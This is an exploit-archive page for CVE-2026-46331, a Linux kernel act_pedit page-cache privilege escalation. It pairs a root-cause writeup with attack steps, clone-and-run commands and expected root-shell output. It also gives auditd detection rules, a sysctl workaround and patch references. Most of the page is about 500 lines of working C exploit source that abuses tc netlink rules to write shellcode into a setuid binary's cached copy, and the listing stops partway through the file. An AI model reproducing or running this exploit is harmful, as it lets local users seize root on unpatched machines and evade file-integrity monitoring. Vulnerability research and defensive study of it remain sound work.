PoC Archive PoC Archive
High CVE-2026-46331 unpatched

Linux Kernel act_pedit Partial COW Page-Cache LPE (CVE-2026-46331)

by Ashraf Zaryouh / 0xBlackash (PoC); sgkdev (alternative PoC) · 2026-06-30

Metadata

FieldValue
Date Added2026-06-30
Last Updated2026-06-30
Author / ResearcherAshraf Zaryouh / 0xBlackash (PoC); sgkdev (alternative PoC)
CVE / AdvisoryCVE-2026-46331
Categorybinary
SeverityHigh
CVSS Score7.8 (CVSSv3.1, kernel.org CNA); 6.7 (Red Hat)
StatusPoC
TagsLPE, Linux kernel, COW, page-cache, act_pedit, tc, netlink, traffic-control, privilege-escalation, userns, C, DirtyFrag
RelatedCVE-2026-31431, CVE-2026-43284, CVE-2026-43500, CVE-2026-46300, CVE-2026-43503

Affected Target

FieldValue
Software / SystemLinux Kernel — net/sched/act_pedit (traffic control packet editing)
Versions Affected4.19.244 through current; confirmed on 5.18–7.1-rc7
Language / PlatformC; Linux x86-64
Authentication RequiredYes (local unprivileged shell)
Network Access RequiredLocal only (loopback, via netlink)

Summary

CVE-2026-46331 is a local privilege escalation in the Linux kernel’s net/sched/act_pedit subsystem. The vulnerable function tcf_pedit_act() computes the writable Copy-on-Write (COW) region using a pre-calculated maximum hint (tcfp_off_max_hint) before the actual runtime packet-edit offset is resolved. Typed pedit keys introduce header offset deltas at runtime, causing the write to land outside the originally COW’d memory region — corrupting page-cache pages that were never privatised. An attacker with CAP_NET_ADMIN (trivially obtained via unprivileged user namespaces on most distributions) can use netlink tc rules to inject shellcode directly into a setuid binary’s page-cache copy, then execute it to obtain a root shell. CVE-2026-46331 is the fifth member of the DirtyFrag family of page-cache corruption vulnerabilities.


Vulnerability Details

Root Cause

tcf_pedit_act() in net/sched/act_pedit.c calls skb_ensure_writable() once with tcfp_off_max_hint — the largest pre-computed write offset — before entering the per-key processing loop. If a typed key’s runtime header pointer lands at a different offset than the hint, the actual write target is partially or entirely outside the COW’d range. An integer overflow in the offset arithmetic further widens the exploitable window.

Family Timeline

DateCVENamePath
Late Apr 2026CVE-2026-31431Copy Failalgif_aead AF_ALG AEAD splice — 4-byte write
May 7 2026CVE-2026-43284, CVE-2026-43500DirtyFragIPsec ESP + RxRPC full write primitive
May 13 2026CVE-2026-46300Fragnesiaskb_try_coalesce() bypass of DirtyFrag patch
May 21 2026CVE-2026-43503DirtyClone__pskb_copy_fclone() via netfilter TEE
2026CVE-2026-46331pedit COWact_pedit partial COW via tc netlink rules

Attack Steps

  1. Gain CAP_NET_ADMIN — Create an unprivileged user namespace (CLONE_NEWUSER | CLONE_NEWNET). Blocked on Ubuntu 24.04+ with AppArmor; PoC implements aa-exec bypass for AppArmor-gated systems.
  2. Parse target ELF — Read the entry point of a setuid binary (e.g., /bin/su).
  3. Calibrate offset delta — Use test writes to determine the runtime offset difference between the intended memory location and the actual pedit write target.
  4. Construct netlink tc rules — Build raw netlink messages configuring a pedit traffic control action on the loopback interface.
  5. Inject shellcode — Trigger the crafted tc rule; the partial COW write lands on the setuid binary’s page-cache copy and overwrites the ELF entry point with x86-64 shellcode (setgid(0); setuid(0); execve("/bin/sh")).
  6. Execute — Run the patched setuid binary. The in-memory binary executes attacker shellcode and spawns a root shell.

The disk binary is unchanged; the write affects only the kernel’s cached copy. Self-cleaning on reboot. Invisible to file-integrity monitoring.

Impact

  • Full local privilege escalation to root from any unprivileged shell.
  • Works on major distributions with unprivileged user namespaces enabled (Debian, Fedora, Ubuntu 22.04).
  • Shared page cache: write from inside a container/namespace affects host processes reading the same binary.

Environment / Lab Setup

OS:       Debian 13 trixie / RHEL 10.0 / Ubuntu 24.04.4 (kernel 6.12.0–6.17.0)
Attacker: Local unprivileged user
Tools:    gcc, make, iproute2 (tc), kernel headers

Setup Steps

1
2
3
4
git clone https://github.com/0xBlackash/CVE-2026-46331
cd CVE-2026-46331
make
./CVE-2026-46331

Alternative PoC:

1
2
3
git clone https://github.com/sgkdev/packet_edit_meme
cd packet_edit_meme
make && ./packet_edit_meme

Proof of Concept

Step-by-Step Reproduction

  1. Verify namespace access

    1
    2
    
    cat /proc/sys/kernel/unprivileged_userns_clone   # Debian: 1
    cat /proc/sys/user/max_user_namespaces            # > 0
    
  2. Build and run as unprivileged user

    1
    2
    
    make
    ./CVE-2026-46331
    
  3. Confirm escalation

    1
    2
    
    id
    # uid=0(root) gid=0(root) groups=0(root)
    

Expected Output

[*] Parsing /bin/su ELF entry point...
[*] Creating user + net namespace...
[*] Calibrating pedit offset delta...
[*] Configuring tc pedit rule on lo...
[*] Injecting shellcode into page cache...
[*] Page-cache overwrite complete.
[*] Executing patched su...
uid=0(root) gid=0(root) groups=0(root)

Detection & Indicators of Compromise

1
2
3
4
5
auditd -a always,exit -F arch=b64 -S unshare -F a0=0x10000000 -k userns_create

auditd -a always,exit -F arch=b64 -S sendmsg -k netlink_send

auditd -a always,exit -F arch=b64 -S execve -F euid=0 -F auid!=0 -k priv_escalation

Mitigation (without patching):

1
2
sysctl -w kernel.unprivileged_userns_clone=0
echo "kernel.unprivileged_userns_clone=0" >> /etc/sysctl.d/99-namespace.conf

Remediation

ActionDetail
PatchApply kernel fixes: commits 2bec122b, 899ee91, 3dee9d0c, b198ed4e; or apply distro backport
Red HatRHSA-2026:27288 and associated advisories
Workaroundsysctl kernel.unprivileged_userns_clone=0; Ubuntu 24.04+ AppArmor blocks default namespace path

References

CVE-2026-46331.c
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
/*
 * CVE-2026-46331.c -- Linux kernel net/sched act_pedit partial COW page cache corruption
 * Local Privilege Escalation PoC
 *
 * Author: Ashraf Zaryouh "0xBlackash"
 * Based on public research and sgkdev's packet_edit_meme
 * WARNING: For educational and authorized testing purposes only.
 * Do not use on systems you do not own.
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <elf.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/pkt_sched.h>
#include <linux/pkt_cls.h>
#include <linux/if_ether.h>
#include <linux/tc_act/tc_pedit.h>

/* pedit_primitive integrated */

#define PEDIT_SLOT       4
#define PEDIT_MAX_WRITE  36

#define IP_IHL_KEY_OFFSET       0
#define IP_IHL_KEY_VALUE        0x4fu
#define IP_IHL_KEY_MASK         0xffffff00u
#define MAX_PEDIT_KEYS          (1 + PEDIT_MAX_WRITE / PEDIT_SLOT)

#define LOOPBACK_ADDR           0x7f000001u
#define LOOPBACK_PREFIX         8
#define LOOPBACK_PORT           4445
#define LISTEN_BACKLOG          8
#define SETTLE_USEC             250000

#define CALIB_PATH              "/tmp/.pedit_calib"
#define CALIB_LEN               4096
#define CALIB_PROBE_OFFSET      512
#define CALIB_MARK_BYTE         0xccu

#define REQUEST_BUF_LEN         8192
#define REPLY_BUF_LEN           4096
#define FILTER_PRIO             1
#define ACTION_LIST_FIRST       1

#ifndef NLA_F_NESTED
#define NLA_F_NESTED            (1 << 15)
#endif
#ifndef TC_H_CLSACT
#define TC_H_CLSACT             TC_H_INGRESS
#endif
#ifndef TC_H_MIN_EGRESS
#define TC_H_MIN_EGRESS         0xFFF3u
#endif
#ifndef TC_ACT_PIPE
#define TC_ACT_PIPE             3
#endif
#ifndef TCA_MATCHALL_ACT
#define TCA_MATCHALL_ACT        2
#endif

#define MIN_DATA_PKT_LEN        100
#ifndef TCA_EM_META_HDR
#define TCA_EM_META_HDR         1
#define TCA_EM_META_RVALUE      3
#endif
#define META_TYPE_INT           1
#define META_ID_PKTLEN          9
#define META_ID_VALUE           0
#define META_KIND_PKTLEN        ((META_TYPE_INT << 12) | META_ID_PKTLEN)
#define META_KIND_VALUE         ((META_TYPE_INT << 12) | META_ID_VALUE)

struct meta_value {
    uint16_t kind;
    uint8_t shift;
    uint8_t op;
};

struct meta_header {
    struct meta_value left;
    struct meta_value right;
};

struct pedit_key_spec {
    uint32_t offset;
    uint32_t value;
    uint32_t mask;
    uint16_t header_type;
};

static int netlink_fd = -1;
static int loopback_index;
static int listen_fd = -1;
static int offset_delta;
static int use_matchall;

static unsigned int request_seq = 1;
static char request_buf[REQUEST_BUF_LEN];
static struct nlmsghdr *request_hdr;

static void request_begin(int type, int flags) {
    memset(request_buf, 0, sizeof(request_buf));
    request_hdr = (struct nlmsghdr *)request_buf;
    request_hdr->nlmsg_len = NLMSG_HDRLEN;
    request_hdr->nlmsg_type = type;
    request_hdr->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK | flags;
    request_hdr->nlmsg_seq = request_seq++;
}

static void *request_reserve(int length) {
    void *area = (char *)request_buf + NLMSG_ALIGN(request_hdr->nlmsg_len);
    request_hdr->nlmsg_len = NLMSG_ALIGN(request_hdr->nlmsg_len) + length;
    return area;
}

static void request_append(const void *data, int length) {
    memcpy(request_reserve(length), data, length);
}

static void request_attr(int type, const void *data, int length) {
    struct rtattr *attr = request_reserve(RTA_LENGTH(length));
    attr->rta_type = type;
    attr->rta_len = RTA_LENGTH(length);
    memcpy(RTA_DATA(attr), data, length);
}

static void request_attr_str(int type, const char *text) {
    request_attr(type, text, strlen(text) + 1);
}

static struct rtattr *request_nest_begin(int type) {
    struct rtattr *attr = request_reserve(RTA_LENGTH(0));
    attr->rta_type = type | NLA_F_NESTED;
    attr->rta_len = RTA_LENGTH(0);
    return attr;
}

static struct rtattr *request_blob_begin(int type) {
    struct rtattr *attr = request_reserve(RTA_LENGTH(0));
    attr->rta_type = type;
    attr->rta_len = RTA_LENGTH(0);
    return attr;
}

static void request_nest_end(struct rtattr *attr) {
    attr->rta_len = (char *)request_buf + request_hdr->nlmsg_len - (char *)attr;
}

static int request_send(int allow_enoent) {
    char reply_buf[REPLY_BUF_LEN];
    struct nlmsghdr *reply;
    struct nlmsgerr *reply_error;
    int received;

    if (send(netlink_fd, request_buf, request_hdr->nlmsg_len, 0) < 0)
        return -1;
    received = recv(netlink_fd, reply_buf, sizeof(reply_buf), 0);
    if (received < 0)
        return -1;
    reply = (struct nlmsghdr *)reply_buf;
    if (reply->nlmsg_type != NLMSG_ERROR)
        return 0;
    reply_error = NLMSG_DATA(reply);
    if (reply_error->error && !(allow_enoent && reply_error->error == -ENOENT))
        return reply_error->error;
    return 0;
}

static int link_up(int index) {
    struct ifinfomsg link;
    request_begin(RTM_NEWLINK, 0);
    memset(&link, 0, sizeof(link));
    link.ifi_family = AF_UNSPEC;
    link.ifi_index = index;
    link.ifi_flags = IFF_UP;
    link.ifi_change = IFF_UP;
    request_append(&link, sizeof(link));
    return request_send(0);
}

static int link_set_addr(int index, uint32_t addr) {
    struct ifaddrmsg ifaddr;
    uint32_t addr_be = htonl(addr);
    request_begin(RTM_NEWADDR, NLM_F_CREATE | NLM_F_REPLACE);
    memset(&ifaddr, 0, sizeof(ifaddr));
    ifaddr.ifa_family = AF_INET;
    ifaddr.ifa_prefixlen = LOOPBACK_PREFIX;
    ifaddr.ifa_index = index;
    request_append(&ifaddr, sizeof(ifaddr));
    request_attr(IFA_LOCAL, &addr_be, sizeof(addr_be));
    request_attr(IFA_ADDRESS, &addr_be, sizeof(addr_be));
    return request_send(0);
}

static void clsact_delete(int index) {
    struct tcmsg msg;
    request_begin(RTM_DELQDISC, 0);
    memset(&msg, 0, sizeof(msg));
    msg.tcm_family = AF_UNSPEC;
    msg.tcm_ifindex = index;
    msg.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);
    msg.tcm_parent = TC_H_CLSACT;
    request_append(&msg, sizeof(msg));
    request_send(1);
}

static int clsact_add(int index) {
    struct tcmsg msg;
    request_begin(RTM_NEWQDISC, NLM_F_CREATE | NLM_F_EXCL);
    memset(&msg, 0, sizeof(msg));
    msg.tcm_family = AF_UNSPEC;
    msg.tcm_ifindex = index;
    msg.tcm_handle = TC_H_MAKE(TC_H_CLSACT, 0);
    msg.tcm_parent = TC_H_CLSACT;
    request_append(&msg, sizeof(msg));
    request_attr_str(TCA_KIND, "clsact");
    return request_send(0);
}

static void append_pktlen_ematch(uint32_t threshold) {
    struct tcf_ematch_tree_hdr tree_header;
    struct tcf_ematch_hdr match_header;
    struct meta_header meta;
    struct rtattr *ematches;
    struct rtattr *match_list;
    struct rtattr *match;

    ematches = request_nest_begin(TCA_BASIC_EMATCHES);

    memset(&tree_header, 0, sizeof(tree_header));
    tree_header.nmatches = 1;
    request_attr(TCA_EMATCH_TREE_HDR, &tree_header, sizeof(tree_header));

    match_list = request_nest_begin(TCA_EMATCH_TREE_LIST);
    match = request_blob_begin(1);

    memset(&match_header, 0, sizeof(match_header));
    match_header.kind = TCF_EM_META;
    match_header.flags = TCF_EM_REL_END;
    request_append(&match_header, sizeof(match_header));

    memset(&meta, 0, sizeof(meta));
    meta.left.kind = META_KIND_PKTLEN;
    meta.left.op = TCF_EM_OPND_GT;
    meta.right.kind = META_KIND_VALUE;
    request_attr(TCA_EM_META_HDR, &meta, sizeof(meta));
    request_attr(TCA_EM_META_RVALUE, &threshold, sizeof(threshold));

    request_nest_end(match);
    request_nest_end(match_list);
    request_nest_end(ematches);
}

static void append_pedit_action(const struct pedit_key_spec *keys, int key_count) {
    char selector_buf[sizeof(struct tc_pedit_sel) + MAX_PEDIT_KEYS * sizeof(struct tc_pedit_key)];
    struct tc_pedit_sel *selector = (void *)selector_buf;
    struct tc_pedit_key *raw_keys = (void *)(selector_buf + sizeof(*selector));
    struct rtattr *action;
    struct rtattr *action_options;
    struct rtattr *keys_ex;
    struct rtattr *key_ex;
    uint16_t header_type;
    uint16_t command;
    int selector_len;
    int index_iter;

    action = request_nest_begin(ACTION_LIST_FIRST);
    request_attr_str(TCA_ACT_KIND, "pedit");
    action_options = request_nest_begin(TCA_ACT_OPTIONS);

    selector_len = sizeof(*selector) + key_count * sizeof(struct tc_pedit_key);
    memset(selector_buf, 0, selector_len);
    selector->nkeys = key_count;
    selector->action = TC_ACT_PIPE;
    for (index_iter = 0; index_iter < key_count; index_iter++) {
        raw_keys[index_iter].off = keys[index_iter].offset;
        raw_keys[index_iter].val = keys[index_iter].value;
        raw_keys[index_iter].mask = keys[index_iter].mask;
    }
    request_attr(TCA_PEDIT_PARMS_EX, selector_buf, selector_len);

    keys_ex = request_nest_begin(TCA_PEDIT_KEYS_EX);
    for (index_iter = 0; index_iter < key_count; index_iter++) {
        key_ex = request_nest_begin(TCA_PEDIT_KEY_EX);
        header_type = keys[index_iter].header_type;
        request_attr(TCA_PEDIT_KEY_EX_HTYPE, &header_type, sizeof(header_type));
        command = TCA_PEDIT_KEY_EX_CMD_SET;
        request_attr(TCA_PEDIT_KEY_EX_CMD, &command, sizeof(command));
        request_nest_end(key_ex);
    }
    request_nest_end(keys_ex);
    request_nest_end(action_options);
    request_nest_end(action);
}

static int egress_pedit_add(int index, const struct pedit_key_spec *keys, int key_count) {
    struct rtattr *options;
    struct rtattr *action_list;
    struct tcmsg msg;

    request_begin(RTM_NEWTFILTER, NLM_F_CREATE | NLM_F_EXCL);
    memset(&msg, 0, sizeof(msg));
    msg.tcm_family = AF_UNSPEC;
    msg.tcm_ifindex = index;
    msg.tcm_parent = TC_H_MAKE(TC_H_CLSACT, TC_H_MIN_EGRESS);
    msg.tcm_info = TC_H_MAKE(FILTER_PRIO << 16, htons(ETH_P_ALL));
    request_append(&msg, sizeof(msg));

    if (use_matchall) {
        request_attr_str(TCA_KIND, "matchall");
        options = request_nest_begin(TCA_OPTIONS);
        action_list = request_nest_begin(TCA_MATCHALL_ACT);
    } else {
        request_attr_str(TCA_KIND, "basic");
        options = request_nest_begin(TCA_OPTIONS);
        append_pktlen_ematch(MIN_DATA_PKT_LEN);
        action_list = request_nest_begin(TCA_BASIC_ACT);
    }
    append_pedit_action(keys, key_count);
    request_nest_end(action_list);
    request_nest_end(options);
    return request_send(0);
}

static void fill_ihl_key(struct pedit_key_spec *key) {
    key->offset = IP_IHL_KEY_OFFSET;
    key->value = IP_IHL_KEY_VALUE;
    key->mask = IP_IHL_KEY_MASK;
    key->header_type = TCA_PEDIT_KEY_EX_HDR_TYPE_NETWORK;
}

static int pedit_burst(int src_fd, const struct pedit_key_spec *keys, int key_count) {
    struct sockaddr_in addr;
    struct stat info;
    off_t file_offset = 0;
    int client_fd;
    int server_fd;

    if (fstat(src_fd, &info))
        return -1;

    clsact_delete(loopback_index);
    if (clsact_add(loopback_index))
        return -1;

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(LOOPBACK_ADDR);
    addr.sin_port = htons(LOOPBACK_PORT);
    client_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (client_fd < 0)
        return -1;
    if (connect(client_fd, (void *)&addr, sizeof(addr))) {
        close(client_fd);
        return -1;
    }
    server_fd = accept(listen_fd, NULL, NULL);
    if (server_fd < 0) {
        close(client_fd);
        return -1;
    }

    if (egress_pedit_add(loopback_index, keys, key_count)) {
        close(client_fd);
        close(server_fd);
        return -1;
    }
    fcntl(client_fd, F_SETFL, O_NONBLOCK);
    if (sendfile(client_fd, src_fd, &file_offset, info.st_size) < 0 && errno != EAGAIN) {
        close(client_fd);
        close(server_fd);
        return -1;
    }
    usleep(SETTLE_USEC);
    close(client_fd);
    close(server_fd);
    return 0;
}

static int calibrate(void) {
    struct pedit_key_spec keys[2];
    uint8_t buf[CALIB_LEN];
    int fd;
    int index_iter;
    int landed = -1;

    fd = open(CALIB_PATH, O_RDWR | O_CREAT | O_TRUNC, 0644);
    if (fd < 0)
        return -1;
    memset(buf, 0, sizeof(buf));
    if (write(fd, buf, sizeof(buf)) != sizeof(buf)) {
        close(fd);
        return -1;
    }
    fsync(fd);

    fill_ihl_key(&keys[0]);
    keys[1].offset = CALIB_PROBE_OFFSET;
    keys[1].value = CALIB_MARK_BYTE * 0x01010101u;
    keys[1].mask = 0;
    keys[1].header_type = TCA_PEDIT_KEY_EX_HDR_TYPE_TCP;
    if (pedit_burst(fd, keys, 2)) {
        close(fd);
        return -1;
    }

    if (pread(fd, buf, sizeof(buf), 0) != sizeof(buf)) {
        close(fd);
        return -1;
    }
    for (index_iter = 0; index_iter + PEDIT_SLOT <= CALIB_LEN; index_iter++) {
        if (buf[index_iter] == CALIB_MARK_BYTE &&
            buf[index_iter + 1] == CALIB_MARK_BYTE &&
            buf[index_iter + 2] == CALIB_MARK_BYTE &&
            buf[index_iter + 3] == CALIB_MARK_BYTE) {
            landed = index_iter;
            break;
        }
    }
    close(fd);
    unlink(CALIB_PATH);
    if (landed < 0)
        return -1;
    offset_delta = landed - CALIB_PROBE_OFFSET;
    return 0;
}

int setup(void) {
    struct sockaddr_in addr;
    int reuse = 1;

    netlink_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
    if (netlink_fd < 0)
        return -1;
    loopback_index = if_nametoindex("lo");
    if (!loopback_index || link_up(loopback_index))
        return -1;
    link_set_addr(loopback_index, LOOPBACK_ADDR);

    listen_fd = socket(AF_INET, SOCK_STREAM, 0);
    if (listen_fd < 0)
        return -1;
    setsockopt(listen_fd, SOL_SOCKET, SO_REUSEADDR, &reuse, sizeof(reuse));
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(LOOPBACK_ADDR);
    addr.sin_port = htons(LOOPBACK_PORT);
    if (bind(listen_fd, (void *)&addr, sizeof(addr)))
        return -1;
    if (listen(listen_fd, LISTEN_BACKLOG))
        return -1;

    if (calibrate() == 0)
        return 0;
    use_matchall = 1;
    return calibrate();
}

int api_fd_write(int fd, off_t offset, const void *src, size_t size) {
    struct pedit_key_spec keys[MAX_PEDIT_KEYS];
    const uint8_t *bytes = src;
    int key_count = 0;
    size_t pos;

    if (size == 0)
        return 0;
    if (size > PEDIT_MAX_WRITE || (size % PEDIT_SLOT) != 0)
        return -1;
    if (offset < (off_t)offset_delta)
        return -1;

    fill_ihl_key(&keys[key_count++]);
    for (pos = 0; pos < size; pos += PEDIT_SLOT) {
        keys[key_count].offset = (uint32_t)(offset + pos) - (uint32_t)offset_delta;
        keys[key_count].value = (uint32_t)bytes[pos] |
                                ((uint32_t)bytes[pos + 1] << 8) |
                                ((uint32_t)bytes[pos + 2] << 16) |
                                ((uint32_t)bytes[pos + 3] << 24);
        keys[key_count].mask = 0;
        keys[key_count].header_type = TCA_PEDIT_KEY_EX_HDR_TYPE_TCP;
        key_count++;
    }
    return pedit_burst(fd, keys, key_count);
}
Showing 500 of 652 lines View full file on GitHub →